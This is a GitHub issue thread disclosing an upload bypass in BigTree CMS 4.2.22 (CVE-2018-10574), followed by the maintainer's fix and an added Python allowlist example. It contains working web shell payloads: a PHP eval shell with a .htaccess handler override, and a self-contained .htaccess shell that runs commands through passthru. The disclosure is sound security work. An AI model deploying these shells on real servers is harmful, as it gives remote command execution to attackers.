Getshell via upload function #335

Closed

hazzel-cn opened this issue Apr 25, 2018 · 3 comments

Comments

@hazzel-cn

Tested on 4.2.22
Platform: Ubuntu + Apache2

Prerequisite

In the Apache configuration, AllowOverride should be All for the web directories so that .htaccess files in sub-directories can take effect. However, this is very easy to satisfy because the URL rewrite function also needs it.

Rationale

Since BigTree needs to ensure compatibility, it has to use a blacklist to filter the extensions of uploaded files. However, while we cannot upload files ending with "ph*", we can upload files that change the parsing rules.

Actually, we can upload a .htaccess to the server to make any file in the same directory be executed as a PHP file.

Reproduction

1. Preparation

Prepare two files. One is a file named haozhe (or whatever you want). The other one is .htaccess.
In haozhe:

<script language="php">eval($_GET['cmd']); phpinfo();</script>

In .htaccess:

# here is a dot in the filename (note: FilesMatch takes a regular expression, so
# the comment has to sit on its own line rather than after the directive)
<FilesMatch "haozhe.">
SetHandler application/x-httpd-php
</FilesMatch>

2. Upload the two files

On the page http://xx/bt3/site/index.php/admin/trees/add/ , click the Browse button to upload a file. Upload these two files.

It works!


@hazzel-cn (Author)

Well, one .htaccess is enough.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make the .htaccess file be interpreted as a PHP file. This occurs after Apache has interpreted
# the Apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20insecure%20files/PHP%20.htaccess/.htaccess

timbuckingham added a commit that referenced this issue Apr 30, 2018
@timbuckingham (Collaborator)

Thank you! I've updated the Storage class regex to reject htaccess files.
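The fix above is a regex change in BigTree's Storage class; the example below is an added illustration and is not BigTree's code. It contrasts a constructed blacklist in the spirit of the one the report bypasses (it only rejects filenames whose final extension starts with "ph", and is an assumption, not the real BigTree regex) with an allowlist-based check that also rejects dotfiles, extension-less names, and double extensions. The `weak_upload_check` and `hardened_upload_check` names are hypothetical. Independently of the application filter, the upload directory itself does not need URL rewriting, so setting `AllowOverride None` for that directory alone removes the .htaccess trick without affecting the rest of the site.

```python
import re

# Constructed approximation of an extension blacklist (NOT BigTree's real regex):
# rejects names whose final extension begins with "ph" (php, phtml, phar, ...).
WEAK_BLACKLIST = re.compile(r"\.ph[a-z0-9]*$", re.IGNORECASE)


def weak_upload_check(filename: str) -> bool:
    """Return True if the blacklist would accept the upload."""
    return WEAK_BLACKLIST.search(filename) is None


# Hardened filter: a short allowlist of final extensions, plus explicit rejection
# of anything that could change how Apache interprets the directory.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
SERVER_CONFIG = {"htaccess", "htpasswd", "htgroups"}
# First character must be alphanumeric, so ".htaccess" and other dotfiles fail here.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def hardened_upload_check(filename: str) -> bool:
    """Return True only for names that are safe to store in a web-served directory."""
    # Work on the basename only, so "dir/../.htaccess" is judged as ".htaccess".
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not SAFE_NAME.match(name):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2:
        # No extension at all (e.g. "haozhe"): a handler rule could still claim it.
        return False
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    # Reject double extensions such as "shell.php.jpg" and names such as
    # "x.htaccess.jpg", which some handler configurations still treat specially.
    if any(p in SERVER_EXECUTABLE or p in SERVER_CONFIG for p in parts[:-1]):
        return False
    return True


def compare(filenames):
    """Return {name: (weak_result, hardened_result)} for a list of names."""
    return {n: (weak_upload_check(n), hardened_upload_check(n)) for n in filenames}


if __name__ == "__main__":
    # Constructed sample names, including the two from the report.
    for name, (weak, hard) in compare(
        [".htaccess", "haozhe", "shell.php", "shell.php.jpg", "photo.jpg"]
    ).items():
        print(f"{name:16} blacklist={'accept' if weak else 'reject':6} "
              f"allowlist={'accept' if hard else 'reject'}")
```

Running the block shows the gap the report relies on: the blacklist accepts both `.htaccess` and the extension-less `haozhe`, while the allowlist rejects them and still accepts ordinary images.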

@fgeek commented Dec 25, 2018

CVE-2018-10574 has been assigned for this vulnerability.
